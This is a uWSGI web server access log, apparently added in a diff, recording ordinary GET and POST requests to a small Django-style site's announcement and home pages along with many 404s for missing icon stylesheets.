+[pid: 12823|app: -1|req: -1/1434] 219.228.146.132 () {38 vars in 760 bytes} [Wed Jan 13 05:39:39 2021] GET /static/js/jquery.slimscroll.js => generated 4475 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 87 bytes (0 switches on core 1)
+[pid: 12823|app: -1|req: -1/1435] 219.228.146.132 () {38 vars in 736 bytes} [Wed Jan 13 05:39:39 2021] GET /static/js/waves.js => generated 4237 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 87 bytes (0 switches on core 0)
+[pid: 12823|app: -1|req: -1/1436] 219.228.146.132 () {38 vars in 748 bytes} [Wed Jan 13 05:39:39 2021] GET /static/js/sidebarmenu.js => generated 10298 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 88 bytes (0 switches on core 1)
+[pid: 12823|app: -1|req: -1/1437] 219.228.146.132 () {38 vars in 824 bytes} [Wed Jan 13 05:39:40 2021] GET /static/assets/plugins/sticky-kit-master/dist/sticky-kit.min.js => generated 3268 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 87 bytes (0 switches on core 0)
+[pid: 12823|app: -1|req: -1/1438] 219.228.146.132 () {38 vars in 746 bytes} [Wed Jan 13 05:39:41 2021] GET /static/js/custom.min.js => generated 1436 bytes in 1 msecs via sendfile() (HTTP/1.1 200) 2 headers in 87 bytes (0 switches on core 1)
+[pid: 12823|app: -1|req: -1/1439] 219.228.146.132 () {38 vars in 820 bytes} [Wed Jan 13 05:39:41 2021] GET /static/assets/plugins/styleswitcher/jQuery.style.switcher.js => generated 1433 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 87 bytes (0 switches on core 0)
+Not Found: /static/scss/icons/font-awesome/css/font-awesome.min.css
+[pid: 12823|app: 0|req: 1081/1440] 219.228.146.132 () {38 vars in 834 bytes} [Wed Jan 13 05:39:42 2021] GET /static/scss/icons/font-awesome/css/font-awesome.min.css => generated 3529 bytes in 4 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1)
+Not Found: /static/scss/icons/simple-line-icons/css/simple-line-icons.css
+[pid: 12823|app: 0|req: 1082/1441] 219.228.146.132 () {38 vars in 846 bytes} [Wed Jan 13 05:39:42 2021] GET /static/scss/icons/simple-line-icons/css/simple-line-icons.css => generated 3547 bytes in 4 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1)
+Not Found: /static/scss/icons/weather-icons/css/weather-icons.min.css
+[pid: 12823|app: 0|req: 1083/1442] 219.228.146.132 () {38 vars in 838 bytes} [Wed Jan 13 05:39:42 2021] GET /static/scss/icons/weather-icons/css/weather-icons.min.css => generated 3535 bytes in 3 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1)
+Not Found: /static/scss/icons/themify-icons/themify-icons.css
+[pid: 12823|app: 0|req: 1084/1443] 219.228.146.132 () {38 vars in 822 bytes} [Wed Jan 13 05:39:42 2021] GET /static/scss/icons/themify-icons/themify-icons.css => generated 3511 bytes in 3 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1)
+Not Found: /static/scss/icons/linea-icons/linea.css
+[pid: 12823|app: 0|req: 1085/1444] 219.228.146.132 () {38 vars in 802 bytes} [Wed Jan 13 05:39:42 2021] GET /static/scss/icons/linea-icons/linea.css => generated 3481 bytes in 3 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1)
+Not Found: /static/scss/icons/flag-icon-css/flag-icon.min.css
+[pid: 12823|app: 0|req: 1086/1445] 219.228.146.132 () {38 vars in 822 bytes} [Wed Jan 13 05:39:42 2021] GET /static/scss/icons/flag-icon-css/flag-icon.min.css => generated 3511 bytes in 4 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1)
+Not Found: /static/scss/icons/material-design-iconic-font/css/materialdesignicons.min.css
+[pid: 12823|app: 0|req: 1087/1446] 219.228.146.132 () {38 vars in 878 bytes} [Wed Jan 13 05:39:42 2021] GET /static/scss/icons/material-design-iconic-font/css/materialdesignicons.min.css => generated 3595 bytes in 4 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1)
+Not Found: /static/css/spinners.css
+[pid: 12823|app: 0|req: 1088/1447] 219.228.146.132 () {38 vars in 770 bytes} [Wed Jan 13 05:39:42 2021] GET /static/css/spinners.css => generated 3433 bytes in 4 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1)
+Not Found: /static/css/animate.css
+[pid: 12823|app: 0|req: 1089/1448] 219.228.146.132 () {38 vars in 768 bytes} [Wed Jan 13 05:39:42 2021] GET /static/css/animate.css => generated 3430 bytes in 4 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1)
+[pid: 12823|app: 0|req: 1090/1449] 219.228.146.132 () {40 vars in 891 bytes} [Wed Jan 13 05:39:57 2021] GET /announcement => generated 0 bytes in 0 msecs (HTTP/1.1 301) 5 headers in 182 bytes (1 switches on core 1)
+[pid: 12823|app: 0|req: 1091/1450] 219.228.146.132 () {40 vars in 893 bytes} [Wed Jan 13 05:39:57 2021] GET /announcement/ => generated 8250 bytes in 5 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 1)
+Not Found: /static/scss/icons/font-awesome/css/font-awesome.min.css
+[pid: 12823|app: 0|req: 1092/1451] 219.228.146.132 () {38 vars in 834 bytes} [Wed Jan 13 05:39:57 2021] GET /static/scss/icons/font-awesome/css/font-awesome.min.css => generated 3529 bytes in 4 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0)
+Not Found: /static/scss/icons/simple-line-icons/css/simple-line-icons.css
+[pid: 12823|app: 0|req: 1093/1452] 219.228.146.132 () {38 vars in 846 bytes} [Wed Jan 13 05:39:57 2021] GET /static/scss/icons/simple-line-icons/css/simple-line-icons.css => generated 3547 bytes in 4 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0)
+Not Found: /static/scss/icons/weather-icons/css/weather-icons.min.css
+[pid: 12823|app: 0|req: 1094/1453] 219.228.146.132 () {38 vars in 838 bytes} [Wed Jan 13 05:39:57 2021] GET /static/scss/icons/weather-icons/css/weather-icons.min.css => generated 3535 bytes in 4 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0)
+Not Found: /static/scss/icons/linea-icons/linea.css
+[pid: 12823|app: 0|req: 1095/1454] 219.228.146.132 () {38 vars in 802 bytes} [Wed Jan 13 05:39:57 2021] GET /static/scss/icons/linea-icons/linea.css => generated 3481 bytes in 3 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0)
+Not Found: /static/scss/icons/themify-icons/themify-icons.css
+[pid: 12823|app: 0|req: 1096/1455] 219.228.146.132 () {38 vars in 822 bytes} [Wed Jan 13 05:39:57 2021] GET /static/scss/icons/themify-icons/themify-icons.css => generated 3511 bytes in 3 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0)
+Not Found: /static/scss/icons/flag-icon-css/flag-icon.min.css
+[pid: 12823|app: 0|req: 1097/1456] 219.228.146.132 () {38 vars in 822 bytes} [Wed Jan 13 05:39:57 2021] GET /static/scss/icons/flag-icon-css/flag-icon.min.css => generated 3511 bytes in 4 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0)
+Not Found: /static/scss/icons/material-design-iconic-font/css/materialdesignicons.min.css
+[pid: 12823|app: 0|req: 1098/1457] 219.228.146.132 () {38 vars in 876 bytes} [Wed Jan 13 05:39:57 2021] GET /static/scss/icons/material-design-iconic-font/css/materialdesignicons.min.css => generated 3595 bytes in 5 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1)
+Not Found: /static/css/spinners.css
+[pid: 12823|app: 0|req: 1099/1458] 219.228.146.132 () {38 vars in 768 bytes} [Wed Jan 13 05:39:57 2021] GET /static/css/spinners.css => generated 3433 bytes in 4 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0)
+Not Found: /static/css/animate.css
+[pid: 12823|app: 0|req: 1100/1459] 219.228.146.132 () {38 vars in 766 bytes} [Wed Jan 13 05:39:57 2021] GET /static/css/animate.css => generated 3430 bytes in 4 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0)
+[pid: 12823|app: 0|req: 1101/1460] 83.97.20.21 () {26 vars in 278 bytes} [Wed Jan 13 05:46:06 2021] GET / => generated 6416 bytes in 1 msecs (HTTP/1.0 200) 7 headers in 349 bytes (1 switches on core 0)
+[pid: 12823|app: 0|req: 1102/1461] 219.228.146.132 () {48 vars in 978 bytes} [Wed Jan 13 05:46:15 2021] POST /announcement/ => generated 27 bytes in 8 msecs (HTTP/1.1 200) 6 headers in 179 bytes (3 switches on core 0)
+[pid: 12823|app: 0|req: 1103/1462] 219.228.146.132 () {40 vars in 896 bytes} [Wed Jan 13 05:46:15 2021] GET /announcement/? => generated 9103 bytes in 6 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 1)
+[pid: 12823|app: 0|req: 1104/1463] 219.228.146.132 () {40 vars in 895 bytes} [Wed Jan 13 05:46:15 2021] GET /announcement/ => generated 9103 bytes in 5 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 0)
+Not Found: /static/scss/icons/font-awesome/css/font-awesome.min.css
+[pid: 12823|app: 0|req: 1105/1464] 219.228.146.132 () {38 vars in 834 bytes} [Wed Jan 13 05:46:16 2021] GET /static/scss/icons/font-awesome/css/font-awesome.min.css => generated 3529 bytes in 4 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1)
+Not Found: /static/scss/icons/simple-line-icons/css/simple-line-icons.css
+[pid: 12823|app: 0|req: 1106/1465] 219.228.146.132 () {38 vars in 846 bytes} [Wed Jan 13 05:46:16 2021] GET /static/scss/icons/simple-line-icons/css/simple-line-icons.css => generated 3547 bytes in 4 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1)
+Not Found: /static/scss/icons/weather-icons/css/weather-icons.min.css
+[pid: 12823|app: 0|req: 1107/1466] 219.228.146.132 () {38 vars in 838 bytes} [Wed Jan 13 05:46:16 2021] GET /static/scss/icons/weather-icons/css/weather-icons.min.css => generated 3535 bytes in 4 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1)
+Not Found: /static/scss/icons/linea-icons/linea.css
+[pid: 12823|app: 0|req: 1108/1467] 219.228.146.132 () {38 vars in 802 bytes} [Wed Jan 13 05:46:16 2021] GET /static/scss/icons/linea-icons/linea.css => generated 3481 bytes in 3 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1)
+Not Found: /static/scss/icons/themify-icons/themify-icons.css
+[pid: 12823|app: 0|req: 1109/1468] 219.228.146.132 () {38 vars in 822 bytes} [Wed Jan 13 05:46:16 2021] GET /static/scss/icons/themify-icons/themify-icons.css => generated 3511 bytes in 4 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1)
+Not Found: /static/scss/icons/flag-icon-css/flag-icon.min.css
+[pid: 12823|app: 0|req: 1110/1469] 219.228.146.132 () {38 vars in 822 bytes} [Wed Jan 13 05:46:16 2021] GET /static/scss/icons/flag-icon-css/flag-icon.min.css => generated 3511 bytes in 4 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1)
+Not Found: /static/scss/icons/material-design-iconic-font/css/materialdesignicons.min.css
+[pid: 12823|app: 0|req: 1111/1470] 219.228.146.132 () {38 vars in 878 bytes} [Wed Jan 13 05:46:16 2021] GET /static/scss/icons/material-design-iconic-font/css/materialdesignicons.min.css => generated 3595 bytes in 4 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1)
+Not Found: /static/css/spinners.css
+[pid: 12823|app: 0|req: 1112/1471] 219.228.146.132 () {38 vars in 770 bytes} [Wed Jan 13 05:46:16 2021] GET /static/css/spinners.css => generated 3433 bytes in 4 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1)
+Not Found: /static/css/animate.css
+[pid: 12823|app: 0|req: 1113/1472] 219.228.146.132 () {38 vars in 768 bytes} [Wed Jan 13 05:46:16 2021] GET /static/css/animate.css => generated 3430 bytes in 4 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1)
+[pid: 12823|app: 0|req: 1114/1473] 219.228.146.132 () {38 vars in 814 bytes} [Wed Jan 13 05:46:37 2021] GET / => generated 6416 bytes in 1 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 1)
+[pid: 12823|app: 0|req: 1115/1474] 219.228.146.132 () {48 vars in 937 bytes} [Wed Jan 13 05:46:43 2021] POST / => generated 27 bytes in 6 msecs (HTTP/1.1 200) 7 headers in 324 bytes (1 switches on core 1)
+[pid: 12823|app: 0|req: 1116/1475] 219.228.146.132 () {40 vars in 866 bytes} [Wed Jan 13 05:46:43 2021] GET /home/ => generated 8745 bytes in 7 msecs (HTTP/1.1 200) 6 headers in 181 bytes (1 switches on core 0)
+[pid: 12823|app: 0|req: 1117/1476] 83.97.20.21 () {26 vars in 278 bytes} [Wed Jan 13 05:47:16 2021] GET / => generated 6416 bytes in 1 msecs (HTTP/1.0 200) 7 headers in 349 bytes (1 switches on core 1)
+[pid: 12823|app: 0|req: 1118/1477] 219.228.146.132 () {48 vars in 978 bytes} [Wed Jan 13 05:48:14 2021] POST /announcement/ => generated 27 bytes in 5 msecs (HTTP/1.1 200) 6 headers in 179 bytes (2 switches on core 1)
+[pid: 12823|app: 0|req: 1119/1478] 219.228.146.132 () {40 vars in 896 bytes} [Wed Jan 13 05:48:14 2021] GET /announcement/? => generated 9971 bytes in 5 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 0)
+[pid: 12823|app: 0|req: 1120/1479] 219.228.146.132 () {40 vars in 895 bytes} [Wed Jan 13 05:48:14 2021] GET /announcement/ => generated 9971 bytes in 5 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 1)
+Not Found: /static/scss/icons/font-awesome/css/font-awesome.min.css
+[pid: 12823|app: 0|req: 1121/1480] 219.228.146.132 () {38 vars in 834 bytes} [Wed Jan 13 05:48:14 2021] GET /static/scss/icons/font-awesome/css/font-awesome.min.css => generated 3529 bytes in 5 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0)
+Not Found: /static/scss/icons/weather-icons/css/weather-icons.min.css
+[pid: 12823|app: 0|req: 1122/1481] 219.228.146.132 () {38 vars in 838 bytes} [Wed Jan 13 05:48:14 2021] GET /static/scss/icons/weather-icons/css/weather-icons.min.css => generated 3535 bytes in 4 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0)
+Not Found: /static/scss/icons/simple-line-icons/css/simple-line-icons.css
+[pid: 12823|app: 0|req: 1123/1482] 219.228.146.132 () {38 vars in 846 bytes} [Wed Jan 13 05:48:14 2021] GET /static/scss/icons/simple-line-icons/css/simple-line-icons.css => generated 3547 bytes in 3 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0)
+Not Found: /static/scss/icons/linea-icons/linea.css
+[pid: 12823|app: 0|req: 1124/1483] 219.228.146.132 () {38 vars in 802 bytes} [Wed Jan 13 05:48:14 2021] GET /static/scss/icons/linea-icons/linea.css => generated 3481 bytes in 3 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0)
+Not Found: /static/scss/icons/flag-icon-css/flag-icon.min.css
+[pid: 12823|app: 0|req: 1125/1484] 219.228.146.132 () {38 vars in 822 bytes} [Wed Jan 13 05:48:14 2021] GET /static/scss/icons/flag-icon-css/flag-icon.min.css => generated 3511 bytes in 3 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0)
+Not Found: /static/scss/icons/themify-icons/themify-icons.css
+[pid: 12823|app: 0|req: 1126/1485] 219.228.146.132 () {38 vars in 822 bytes} [Wed Jan 13 05:48:14 2021] GET /static/scss/icons/themify-icons/themify-icons.css => generated 3511 bytes in 9 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1)
+Not Found: /static/scss/icons/material-design-iconic-font/css/materialdesignicons.min.css
+[pid: 12823|app: 0|req: 1127/1486] 219.228.146.132 () {38 vars in 878 bytes} [Wed Jan 13 05:48:14 2021] GET /static/scss/icons/material-design-iconic-font/css/materialdesignicons.min.css => generated 3595 bytes in 4 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0)
+Not Found: /static/css/spinners.css
+[pid: 12823|app: 0|req: 1128/1487] 219.228.146.132 () {38 vars in 770 bytes} [Wed Jan 13 05:48:14 2021] GET /static/css/spinners.css => generated 3433 bytes in 4 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0)
+Not Found: /static/css/animate.css
+[pid: 12823|app: 0|req: 1129/1488] 219.228.146.132 () {38 vars in 768 bytes} [Wed Jan 13 05:48:14 2021] GET /static/css/animate.css => generated 3430 bytes in 3 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0)
+[pid: 12823|app: 0|req: 1130/1489] 219.228.146.132 () {42 vars in 897 bytes} [Wed Jan 13 05:51:55 2021] GET /home/ => generated 8861 bytes in 7 msecs (HTTP/1.1 200) 6 headers in 181 bytes (1 switches on core 0)
+[pid: 12823|app: -1|req: -1/1490] 219.228.146.132 () {42 vars in 838 bytes} [Wed Jan 13 05:51:56 2021] GET /static/img/favicon.ico => generated 1150 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 87 bytes (0 switches on core 1)
+[pid: 12823|app: 0|req: 1132/1491] 219.228.146.132 () {40 vars in 896 bytes} [Wed Jan 13 05:54:42 2021] GET /announcement/? => generated 9971 bytes in 8 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 0)
+[pid: 12823|app: 0|req: 1132/1492] 219.228.146.132 () {48 vars in 978 bytes} [Wed Jan 13 05:54:42 2021] POST /announcement/ => generated 27 bytes in 9 msecs (HTTP/1.1 200) 6 headers in 179 bytes (2 switches on core 1)
+[pid: 12823|app: 0|req: 1133/1493] 219.228.146.132 () {40 vars in 895 bytes} [Wed Jan 13 05:54:42 2021] GET /announcement/ => generated 10842 bytes in 5 msecs (HTTP/1.1 200) 7 headers in 350 bytes (1 switches on core 0)
+Not Found: /static/scss/icons/font-awesome/css/font-awesome.min.css
+[pid: 12823|app: 0|req: 1134/1494] 219.228.146.132 () {38 vars in 834 bytes} [Wed Jan 13 05:54:42 2021] GET /static/scss/icons/font-awesome/css/font-awesome.min.css => generated 3529 bytes in 4 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1)
+Not Found: /static/scss/icons/simple-line-icons/css/simple-line-icons.css
+[pid: 12823|app: 0|req: 1135/1495] 219.228.146.132 () {38 vars in 846 bytes} [Wed Jan 13 05:54:42 2021] GET /static/scss/icons/simple-line-icons/css/simple-line-icons.css => generated 3547 bytes in 4 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1)
+Not Found: /static/scss/icons/weather-icons/css/weather-icons.min.css
+[pid: 12823|app: 0|req: 1136/1496] 219.228.146.132 () {38 vars in 838 bytes} [Wed Jan 13 05:54:42 2021] GET /static/scss/icons/weather-icons/css/weather-icons.min.css => generated 3535 bytes in 3 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1)
+Not Found: /static/scss/icons/themify-icons/themify-icons.css
+[pid: 12823|app: 0|req: 1137/1497] 219.228.146.132 () {38 vars in 822 bytes} [Wed Jan 13 05:54:42 2021] GET /static/scss/icons/themify-icons/themify-icons.css => generated 3511 bytes in 3 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1)
+Not Found: /static/scss/icons/linea-icons/linea.css
+[pid: 12823|app: 0|req: 1138/1498] 219.228.146.132 () {38 vars in 802 bytes} [Wed Jan 13 05:54:42 2021] GET /static/scss/icons/linea-icons/linea.css => generated 3481 bytes in 3 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1)
+Not Found: /static/scss/icons/flag-icon-css/flag-icon.min.css
+[pid: 12823|app: 0|req: 1139/1499] 219.228.146.132 () {38 vars in 822 bytes} [Wed Jan 13 05:54:42 2021] GET /static/scss/icons/flag-icon-css/flag-icon.min.css => generated 3511 bytes in 3 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0)
+Not Found: /static/scss/icons/material-design-iconic-font/css/materialdesignicons.min.css
+[pid: 12823|app: 0|req: 1140/1500] 219.228.146.132 () {38 vars in 878 bytes} [Wed Jan 13 05:54:42 2021] GET /static/scss/icons/material-design-iconic-font/css/materialdesignicons.min.css => generated 3595 bytes in 4 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1)
+Not Found: /static/css/spinners.css
+[pid: 12823|app: 0|req: 1141/1501] 219.228.146.132 () {38 vars in 770 bytes} [Wed Jan 13 05:54:42 2021] GET /static/css/spinners.css => generated 3433 bytes in 3 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1)
+Not Found: /static/css/animate.css
+[pid: 12823|app: 0|req: 1142/1502] 219.228.146.132 () {38 vars in 768 bytes} [Wed Jan 13 05:54:42 2021] GET /static/css/animate.css => generated 3430 bytes in 3 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1)
+[pid: 12823|app: 0|req: 1143/1503] 219.228.146.93 () {38 vars in 746 bytes} [Wed Jan 13 05:54:50 2021] GET / => generated 6416 bytes in 1 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 1)
+[pid: 12823|app: -1|req: -1/1504] 219.228.146.93 () {38 vars in 764 bytes} [Wed Jan 13 05:54:50 2021] GET /static/css/custom-styles.css => generated 20296 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 88 bytes (0 switches on core 1)
+[pid: 12823|app: -1|req: -1/1505] 219.228.146.93 () {38 vars in 753 bytes} [Wed Jan 13 05:54:50 2021] GET /static/js/jquery.flexslider.js => generated 40181 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 88 bytes (0 switches on core 1)
+[pid: 12823|app: -1|req: -1/1506] 219.228.146.93 () {38 vars in 739 bytes} [Wed Jan 13 05:54:50 2021] GET /static/js/jquery.min.js => generated 86596 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 88 bytes (0 switches on core 1)
+[pid: 12823|app: -1|req: -1/1507] 219.228.146.93 () {38 vars in 778 bytes} [Wed Jan 13 05:54:50 2021] GET /static/css/bootstrap-responsive.css => generated 20999 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 88 bytes (0 switches on core 1)
+[pid: 12823|app: -1|req: -1/1508] 219.228.146.93 () {38 vars in 756 bytes} [Wed Jan 13 05:54:50 2021] GET /static/css/bootstrap.css => generated 118128 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 89 bytes (0 switches on core 1)
+[pid: 12823|app: -1|req: -1/1509] 219.228.146.93 () {38 vars in 755 bytes} [Wed Jan 13 05:54:50 2021] GET /static/js/jquery.prettyPhoto.js => generated 35912 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 88 bytes (0 switches on core 1)
+[pid: 12823|app: -1|req: -1/1510] 219.228.146.93 () {38 vars in 758 bytes} [Wed Jan 13 05:54:50 2021] GET /static/css/flexslider.css => generated 3552 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 87 bytes (0 switches on core 1)
+[pid: 12823|app: -1|req: -1/1511] 219.228.146.93 () {38 vars in 760 bytes} [Wed Jan 13 05:54:50 2021] GET /static/css/prettyPhoto.css => generated 26845 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 88 bytes (0 switches on core 1)
+[pid: 12823|app: -1|req: -1/1512] 219.228.146.93 () {38 vars in 737 bytes} [Wed Jan 13 05:54:50 2021] GET /static/js/bootstrap.js => generated 56264 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 88 bytes (0 switches on core 1)
+[pid: 12823|app: -1|req: -1/1513] 219.228.146.93 () {38 vars in 745 bytes} [Wed Jan 13 05:54:50 2021] GET /static/js/jquery.custom.js => generated 3065 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 87 bytes (0 switches on core 1)
+[pid: 12823|app: -1|req: -1/1514] 219.228.146.93 () {38 vars in 785 bytes} [Wed Jan 13 05:54:52 2021] GET /static/img/page-bg-1.jpg => generated 1600 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 87 bytes (0 switches on core 1)
+[pid: 12823|app: -1|req: -1/1515] 219.228.146.93 () {38 vars in 791 bytes} [Wed Jan 13 05:54:52 2021] GET /static/img/back-top-btn.png => generated 1790 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 87 bytes (0 switches on core 1)
+[pid: 12823|app: 0|req: 1145/1516] 219.228.146.132 () {40 vars in 896 bytes} [Wed Jan 13 05:55:31 2021] GET /announcement/? => generated 10842 bytes in 5 msecs (HTTP/1.1 200) 7 headers in 350 bytes (1 switches on core 0)
+[pid: 12823|app: 0|req: 1145/1517] 219.228.146.132 () {48 vars in 979 bytes} [Wed Jan 13 05:55:31 2021] POST /announcement/ => generated 27 bytes in 19 msecs (HTTP/1.1 200) 6 headers in 179 bytes (10 switches on core 1)
+Not Found: /static/scss/icons/font-awesome/css/font-awesome.min.css
+[pid: 12823|app: 0|req: 1146/1518] 219.228.146.132 () {38 vars in 834 bytes} [Wed Jan 13 05:55:31 2021] GET /static/scss/icons/font-awesome/css/font-awesome.min.css => generated 3529 bytes in 4 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0)
+Not Found: /static/scss/icons/simple-line-icons/css/simple-line-icons.css
+[pid: 12823|app: 0|req: 1147/1519] 219.228.146.132 () {38 vars in 846 bytes} [Wed Jan 13 05:55:31 2021] GET /static/scss/icons/simple-line-icons/css/simple-line-icons.css => generated 3547 bytes in 3 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0)
+Not Found: /static/scss/icons/themify-icons/themify-icons.css
+[pid: 12823|app: 0|req: 1148/1520] 219.228.146.132 () {38 vars in 822 bytes} [Wed Jan 13 05:55:31 2021] GET /static/scss/icons/themify-icons/themify-icons.css => generated 3511 bytes in 3 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0)
+Not Found: /static/scss/icons/linea-icons/linea.css
+[pid: 12823|app: 0|req: 1149/1521] 219.228.146.132 () {38 vars in 802 bytes} [Wed Jan 13 05:55:31 2021] GET /static/scss/icons/linea-icons/linea.css => generated 3481 bytes in 3 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0)
+Not Found: /static/scss/icons/flag-icon-css/flag-icon.min.css
+[pid: 12823|app: 0|req: 1150/1522] 219.228.146.132 () {38 vars in 822 bytes} [Wed Jan 13 05:55:31 2021] GET /static/scss/icons/flag-icon-css/flag-icon.min.css => generated 3511 bytes in 3 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0)
+Not Found: /static/scss/icons/weather-icons/css/weather-icons.min.css
+[pid: 12823|app: 0|req: 1151/1523] 219.228.146.132 () {38 vars in 838 bytes} [Wed Jan 13 05:55:31 2021] GET /static/scss/icons/weather-icons/css/weather-icons.min.css => generated 3535 bytes in 3 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1)
+Not Found: /static/scss/icons/material-design-iconic-font/css/materialdesignicons.min.css
+[pid: 12823|app: 0|req: 1152/1524] 219.228.146.132 () {38 vars in 878 bytes} [Wed Jan 13 05:55:31 2021] GET /static/scss/icons/material-design-iconic-font/css/materialdesignicons.min.css => generated 3595 bytes in 3 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0)
+Not Found: /static/css/spinners.css
+[pid: 12823|app: 0|req: 1153/1525] 219.228.146.132 () {38 vars in 770 bytes} [Wed Jan 13 05:55:31 2021] GET /static/css/spinners.css => generated 3433 bytes in 3 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0)
+Not Found: /static/css/animate.css
+[pid: 12823|app: 0|req: 1154/1526] 219.228.146.132 () {38 vars in 768 bytes} [Wed Jan 13 05:55:31 2021] GET /static/css/animate.css => generated 3430 bytes in 4 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0)
+[pid: 12823|app: 0|req: 1156/1527] 219.228.146.132 () {48 vars in 979 bytes} [Wed Jan 13 05:59:30 2021] POST /announcement/? => generated 27 bytes in 8 msecs (HTTP/1.1 200) 6 headers in 179 bytes (3 switches on core 0)
+[pid: 12823|app: 0|req: 1156/1528] 219.228.146.132 () {40 vars in 896 bytes} [Wed Jan 13 05:59:30 2021] GET /announcement/? => generated 11713 bytes in 9 msecs (HTTP/1.1 200) 7 headers in 350 bytes (1 switches on core 1)
+[pid: 12823|app: 0|req: 1157/1529] 219.228.146.132 () {40 vars in 895 bytes} [Wed Jan 13 05:59:30 2021] GET /announcement/ => generated 12563 bytes in 5 msecs (HTTP/1.1 200) 7 headers in 350 bytes (1 switches on core 0)
+Not Found: /static/scss/icons/font-awesome/css/font-awesome.min.css
+[pid: 12823|app: 0|req: 1158/1530] 219.228.146.132 () {38 vars in 833 bytes} [Wed Jan 13 05:59:30 2021] GET /static/scss/icons/font-awesome/css/font-awesome.min.css => generated 3529 bytes in 6 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1)
+Not Found: /static/scss/icons/weather-icons/css/weather-icons.min.css
